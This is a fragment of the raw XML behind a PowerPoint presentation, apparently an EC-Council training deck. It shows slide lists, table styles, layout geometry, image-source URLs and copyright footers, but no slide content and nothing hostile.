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charts/chart1.xml" ContentType="application/vnd.openxmlformats-officedocument.drawingml.chart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19" r:id="rId1"/>
    <p:sldMasterId id="2147484406" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId51"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId52"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="363" r:id="rId3"/>
    <p:sldId id="659" r:id="rId4"/>
    <p:sldId id="668" r:id="rId5"/>
    <p:sldId id="1055" r:id="rId6"/>
    <p:sldId id="3632" r:id="rId7"/>
    <p:sldId id="1130" r:id="rId8"/>
    <p:sldId id="3644" r:id="rId9"/>
    <p:sldId id="3650" r:id="rId10"/>
    <p:sldId id="946" r:id="rId11"/>
    <p:sldId id="900" r:id="rId12"/>
    <p:sldId id="3630" r:id="rId13"/>
    <p:sldId id="948" r:id="rId14"/>
    <p:sldId id="1077" r:id="rId15"/>
    <p:sldId id="1310" r:id="rId16"/>
    <p:sldId id="3626" r:id="rId17"/>
    <p:sldId id="1259" r:id="rId18"/>
    <p:sldId id="666" r:id="rId19"/>
    <p:sldId id="3649" r:id="rId20"/>
    <p:sldId id="3631" r:id="rId21"/>
    <p:sldId id="3645" r:id="rId22"/>
    <p:sldId id="785" r:id="rId23"/>
    <p:sldId id="3646" r:id="rId24"/>
    <p:sldId id="889" r:id="rId25"/>
    <p:sldId id="322" r:id="rId26"/>
    <p:sldId id="789" r:id="rId27"/>
    <p:sldId id="2951" r:id="rId28"/>
    <p:sldId id="3633" r:id="rId29"/>
    <p:sldId id="3628" r:id="rId30"/>
    <p:sldId id="3647" r:id="rId31"/>
    <p:sldId id="832" r:id="rId32"/>
    <p:sldId id="833" r:id="rId33"/>
    <p:sldId id="834" r:id="rId34"/>
    <p:sldId id="809" r:id="rId35"/>
    <p:sldId id="290" r:id="rId36"/>
    <p:sldId id="1048" r:id="rId37"/>
    <p:sldId id="3637" r:id="rId38"/>
    <p:sldId id="851" r:id="rId39"/>
    <p:sldId id="3639" r:id="rId40"/>
    <p:sldId id="670" r:id="rId41"/>
    <p:sldId id="1095" r:id="rId42"/>
    <p:sldId id="3641" r:id="rId43"/>
    <p:sldId id="1057" r:id="rId44"/>
    <p:sldId id="855" r:id="rId45"/>
    <p:sldId id="3642" r:id="rId46"/>
    <p:sldId id="3648" r:id="rId47"/>
    <p:sldId id="3643" r:id="rId48"/>
    <p:sldId id="1050" r:id="rId49"/>
    <p:sldId id="1047" r:id="rId50"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="12192000"/>
  <p:custDataLst>
    <p:tags r:id="rId5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4176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840" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="2160" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
      </p15:notes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Editor" initials="editor" lastIdx="36" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Editor" providerId="None"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Author" initials="A" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Author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FA8B3"/>
    <a:srgbClr val="50B6C1"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="5B9BD5"/>
    <a:srgbClr val="FFDC6D"/>
    <a:srgbClr val="0C2F3A"/>
    <a:srgbClr val="041319"/>
    <a:srgbClr val="0076A0"/>
    <a:srgbClr val="144887"/>
    <a:srgbClr val="4F81B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A111915-BE36-4E01-A7E5-04B1672EAD32}" styleName="Light Style 2 - Accent 5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</a:tcBdr>
      </a:tcStyle>
    </a:band1H>
    <a:band1V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</a:tcBdr>
      </a:tcStyle>
    </a:band1V>
    <a:band2V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5"/>
        </a:fillRef>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{912C8C85-51F0-491E-9774-3900AFEF0FD7}" styleName="Light Style 2 - Accent 6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</a:tcStyle>
    </a:band1H>
    <a:band1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1V>
    <a:band2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6"/>
        </a:fillRef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7DF18680-E054-41AD-8BC1-D1AEF772440D}" styleName="Medium Style 2 - Accent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35758FB7-9AC5-4552-8A53-C91805E547FA}" styleName="Themed Style 1 - Accent 5">
    <a:tblBg>
      <a:fillRef idx="2">
        <a:schemeClr val="accent5"/>
      </a:fillRef>
      <a:effectRef idx="1">
        <a:schemeClr val="accent5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Ref idx="1">
              <a:schemeClr val="accent5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</a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent5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5"/>
            </a:lnRef>
          </a:left>
          <a:right>
            <a:lnRef idx="2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2">
              <a:schemeClr val="accent5"/>
            </a:lnRef>
          </a:top>
          <a:bottom>
            <a:lnRef idx="2">
              <a:schemeClr val="accent5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/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{69C7853C-536D-4A76-A0AE-DD22124D55A5}" styleName="Themed Style 1 - Accent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  <a:tblStyle styleId="{BC89EF96-8CEA-46FF-86C4-4CE0E7609802}" styleName="Light Style 3 - Accent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00A15C55-8517-42AA-B614-E9B94910E393}" styleName="Medium Style 2 - Accent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10A1B5D5-9B99-4C35-A422-299274C87663}" styleName="Medium Style 1 - Acc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6">
              <a:tint val="20000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1H>
    <a:band1V>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent6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16D9F66E-5EB9-4882-86FB-DCBF35E3C3E4}" styleName="Medium Style 4 - Acc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6"/>
              </a:solidFill>
            </a:ln>
          </a:top>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent6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6">
              <a:tint val="20000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{D7AC3CCA-C797-4891-BE02-D94E43425B78}" styleName="Medium Style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 w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk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dk1">
              <a:tint val="20000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{C4B1156A-380E-4F78-BDF5-A606A8083BF9}" styleName="Medium Style 4 - Accent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 w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent4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4"/>
              </a:solidFill>
            </a:ln>
          </a:top>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent4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4">
              <a:tint val="20000"/>
            </a:schemeClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
  <a:tblStyle styleId="{6E25E649-3F16-4E02-A733-19D2CDBF48F0}" styleName="Medium Style 3 - Accent 1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EB9631B5-78F2-41C9-869B-9F39066F8104}" styleName="Medium Style 3 - Accent 4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3114" autoAdjust="0"/>
    <p:restoredTop sz="94364" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="936" y="60"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="4176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34386"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="53" d="100"/>
          <a:sy n="53" d="100"/>
        </p:scale>
        <p:origin x="-2856" y="-90"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3840"/>
        <p:guide pos="2160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50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide48.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps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29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide39.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthor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tags" Target="tags/tag1.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles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theme" Target="theme/theme1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handoutMaster" Target="handoutMasters/handoutMaster1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viewProps" Target="viewProps.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide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4CA-4AAA-8FA6-E360E6D7B6E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6096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6096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A48C40F-ED06-43E5-ABF8-52C3FD086F7C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/24/2022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11580284"/>
            <a:ext cx="2971800" cy="6096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11580284"/>
            <a:ext cx="2971800" cy="6096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C579280-364C-4D94-BB1D-C0E9A366DD4B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1146869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6096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6096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67F13B5-4B41-4643-A69A-7DB21160926F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/24/2022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-635000" y="914400"/>
            <a:ext cx="8128000" cy="4572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5791200"/>
            <a:ext cx="5486400" cy="54864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11580284"/>
            <a:ext cx="2971800" cy="6096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11580284"/>
            <a:ext cx="2971800" cy="6096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B5F3631-E628-4A72-9EBA-B3CD721345D4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6730133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381000" y="685800"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm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195" name="Notes Placeholder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96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2F36CEA6-4DEC-453E-97E3-4696949721A7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill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3654946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C73934-D492-4443-9427-018DE5D6DDA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rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="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1837080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IN" dirty="0"/>
              <a:t>https://www.shutterstock.com/image-photo/wireless-communication-network-concept-iotinternet-things-1007765257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5F3631-E628-4A72-9EBA-B3CD721345D4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9561479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ED8A9B0-80EF-A34D-B345-E2DEC5501E01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rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="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5004389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5F3631-E628-4A72-9EBA-B3CD721345D4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507299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5F3631-E628-4A72-9EBA-B3CD721345D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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9551382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9193602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5F3631-E628-4A72-9EBA-B3CD721345D4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3781464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267532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5F3631-E628-4A72-9EBA-B3CD721345D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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6447810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5F3631-E628-4A72-9EBA-B3CD721345D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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947814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6187746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5F3631-E628-4A72-9EBA-B3CD721345D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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3860204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B5F3631-E628-4A72-9EBA-B3CD721345D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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5396062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B5F3631-E628-4A72-9EBA-B3CD721345D4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989335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IN" dirty="0"/>
              <a:t>https://www.shutterstock.com/image-vector/unsecured-public-wireless-hotspot-design-wifi-740700484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5F3631-E628-4A72-9EBA-B3CD721345D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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7176396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3793996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5344233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6425337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450142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362127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5F3631-E628-4A72-9EBA-B3CD721345D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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0063189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B5F3631-E628-4A72-9EBA-B3CD721345D4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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480369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1512963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930199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2192000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="id-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{013FABC4-5AA0-4238-A40A-102911FB981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6578072"/>
            <a:ext cx="12192000" cy="293783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{676A061E-5E5C-42C8-BB94-2D1422552A8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508883" y="6598005"/>
            <a:ext cx="6676283" cy="25391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sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Copyright © by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Impact" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EC-Council</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>All Rights Reserved. Reproduction is Strictly Prohibited.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52114105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3048001" y="1"/>
            <a:ext cx="3047999" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="id-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25ECE405-2C6E-4FED-9D13-292685EB94D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6578072"/>
            <a:ext cx="12192000" cy="293783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E89F4158-93AB-4607-9FFA-F5C66962BDD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5508883" y="6598005"/>
            <a:ext cx="6676283" cy="25391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sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Copyright © by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Impact" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EC-Council</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>All Rights Reserved. Reproduction is Strictly Prohibited.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3078387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ackground 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0317617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2436972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No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4362989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app_fea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-2" y="-1"/>
            <a:ext cx="12192003" cy="3230219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000">
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/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1" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1535889" y="1233379"/>
            <a:ext cx="2360859" cy="4225173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1000">
                <a:latin typeface="Lato Light"/>
                <a:cs typeface="Lato Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0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059710246"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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phone_06_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164496" y="2172281"/>
            <a:ext cx="1900262" cy="3364250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18874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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" advClick="0"/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pad_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7509177" y="1789727"/>
            <a:ext cx="2670197" cy="3599324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078445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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" advClick="0"/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14675395"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf hdr="0" ftr="0" dt="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ffee Brea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7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect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600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/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63856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3000">
        <p14:reveal/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advClick="0" advTm="3000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3048002" y="1"/>
            <a:ext cx="3047999" cy="6562164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1600">
                <a:solidFill>
                  <a:schemeClr val="accent2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72202050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136355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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advClick="0" advTm="3000"/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Our team 1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5350933" y="0"/>
            <a:ext cx="5283201" cy="6858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133670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Opening (30-03-21)-1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Рисунок 54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6592836" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 6671494 w 9889254"/>
              <a:gd name="connsiteY0" fmla="*/ 1 h 10293057"/>
              <a:gd name="connsiteX1" fmla="*/ 9889254 w 9889254"/>
              <a:gd name="connsiteY1" fmla="*/ 1 h 10293057"/>
              <a:gd name="connsiteX2" fmla="*/ 9889254 w 9889254"/>
              <a:gd name="connsiteY2" fmla="*/ 798896 h 10293057"/>
              <a:gd name="connsiteX3" fmla="*/ 8280374 w 9889254"/>
              <a:gd name="connsiteY3" fmla="*/ 2407776 h 10293057"/>
              <a:gd name="connsiteX4" fmla="*/ 9889254 w 9889254"/>
              <a:gd name="connsiteY4" fmla="*/ 4016656 h 10293057"/>
              <a:gd name="connsiteX5" fmla="*/ 9889254 w 9889254"/>
              <a:gd name="connsiteY5" fmla="*/ 10293057 h 10293057"/>
              <a:gd name="connsiteX6" fmla="*/ 6671494 w 9889254"/>
              <a:gd name="connsiteY6" fmla="*/ 10293057 h 10293057"/>
              <a:gd name="connsiteX7" fmla="*/ 6671495 w 9889254"/>
              <a:gd name="connsiteY7" fmla="*/ 4016655 h 10293057"/>
              <a:gd name="connsiteX8" fmla="*/ 7956130 w 9889254"/>
              <a:gd name="connsiteY8" fmla="*/ 2440462 h 10293057"/>
              <a:gd name="connsiteX9" fmla="*/ 8280370 w 9889254"/>
              <a:gd name="connsiteY9" fmla="*/ 2407775 h 10293057"/>
              <a:gd name="connsiteX10" fmla="*/ 7956129 w 9889254"/>
              <a:gd name="connsiteY10" fmla="*/ 2375089 h 10293057"/>
              <a:gd name="connsiteX11" fmla="*/ 6671494 w 9889254"/>
              <a:gd name="connsiteY11" fmla="*/ 798896 h 10293057"/>
              <a:gd name="connsiteX12" fmla="*/ 3335748 w 9889254"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 10293057"/>
              <a:gd name="connsiteX13" fmla="*/ 6553507 w 9889254"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 10293057"/>
              <a:gd name="connsiteX14" fmla="*/ 6553507 w 9889254"/>
              <a:gd name="connsiteY14" fmla="*/ 5390084 h 10293057"/>
              <a:gd name="connsiteX15" fmla="*/ 4944627 w 9889254"/>
              <a:gd name="connsiteY15" fmla="*/ 6998964 h 10293057"/>
              <a:gd name="connsiteX16" fmla="*/ 4944626 w 9889254"/>
              <a:gd name="connsiteY16" fmla="*/ 6998964 h 10293057"/>
              <a:gd name="connsiteX17" fmla="*/ 6553506 w 9889254"/>
              <a:gd name="connsiteY17" fmla="*/ 8607844 h 10293057"/>
              <a:gd name="connsiteX18" fmla="*/ 6553506 w 9889254"/>
              <a:gd name="connsiteY18" fmla="*/ 10293057 h 10293057"/>
              <a:gd name="connsiteX19" fmla="*/ 3335747 w 9889254"/>
              <a:gd name="connsiteY19" fmla="*/ 10293057 h 10293057"/>
              <a:gd name="connsiteX20" fmla="*/ 3335747 w 9889254"/>
              <a:gd name="connsiteY20" fmla="*/ 8607843 h 10293057"/>
              <a:gd name="connsiteX21" fmla="*/ 4780129 w 9889254"/>
              <a:gd name="connsiteY21" fmla="*/ 7007269 h 10293057"/>
              <a:gd name="connsiteX22" fmla="*/ 4944618 w 9889254"/>
              <a:gd name="connsiteY22" fmla="*/ 6998963 h 10293057"/>
              <a:gd name="connsiteX23" fmla="*/ 4780129 w 9889254"/>
              <a:gd name="connsiteY23" fmla="*/ 6990657 h 10293057"/>
              <a:gd name="connsiteX24" fmla="*/ 3335747 w 9889254"/>
              <a:gd name="connsiteY24" fmla="*/ 5390084 h 10293057"/>
              <a:gd name="connsiteX25" fmla="*/ 0 w 9889254"/>
              <a:gd name="connsiteY25" fmla="*/ 0 h 10293057"/>
              <a:gd name="connsiteX26" fmla="*/ 3217759 w 9889254"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 10293057"/>
              <a:gd name="connsiteX27" fmla="*/ 3217759 w 9889254"/>
              <a:gd name="connsiteY27" fmla="*/ 2113013 h 10293057"/>
              <a:gd name="connsiteX28" fmla="*/ 1773378 w 9889254"/>
              <a:gd name="connsiteY28" fmla="*/ 3713587 h 10293057"/>
              <a:gd name="connsiteX29" fmla="*/ 1608879 w 9889254"/>
              <a:gd name="connsiteY29" fmla="*/ 3721893 h 10293057"/>
              <a:gd name="connsiteX30" fmla="*/ 3217759 w 9889254"/>
              <a:gd name="connsiteY30" fmla="*/ 5330773 h 10293057"/>
              <a:gd name="connsiteX31" fmla="*/ 3217759 w 9889254"/>
              <a:gd name="connsiteY31" fmla="*/ 10293057 h 10293057"/>
              <a:gd name="connsiteX32" fmla="*/ 0 w 9889254"/>
              <a:gd name="connsiteY32" fmla="*/ 10293057 h 10293057"/>
              <a:gd name="connsiteX33" fmla="*/ 0 w 9889254"/>
              <a:gd name="connsiteY33" fmla="*/ 5330772 h 10293057"/>
              <a:gd name="connsiteX34" fmla="*/ 1444382 w 9889254"/>
              <a:gd name="connsiteY34" fmla="*/ 3730199 h 10293057"/>
              <a:gd name="connsiteX35" fmla="*/ 1608872 w 9889254"/>
              <a:gd name="connsiteY35" fmla="*/ 3721893 h 10293057"/>
              <a:gd name="connsiteX36" fmla="*/ 1444381 w 9889254"/>
              <a:gd name="connsiteY36" fmla="*/ 3713587 h 10293057"/>
              <a:gd name="connsiteX37" fmla="*/ 0 w 9889254"/>
              <a:gd name="connsiteY37" fmla="*/ 2113013 h 102930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9889254" h="10293057">
                <a:moveTo>
                  <a:pt x="6671494" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9889254" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9889254" y="798896"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9889254" y="1687456"/>
                  <a:pt x="9168934" y="2407776"/>
                  <a:pt x="8280374" y="2407776"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9168934" y="2407776"/>
                  <a:pt x="9889254" y="3128096"/>
                  <a:pt x="9889254" y="4016656"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9889254" y="10293057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6671494" y="10293057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6671495" y="4016655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6671495" y="3239165"/>
                  <a:pt x="7222990" y="2590483"/>
                  <a:pt x="7956130" y="2440462"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8280370" y="2407775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7956129" y="2375089"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7222989" y="2225066"/>
                  <a:pt x="6671494" y="1576386"/>
                  <a:pt x="6671494" y="798896"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3335748" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6553507" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553507" y="5390084"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6553507" y="6278644"/>
                  <a:pt x="5833187" y="6998964"/>
                  <a:pt x="4944627" y="6998964"/>
                </a:cubicBezTo>
                <a:lnTo>
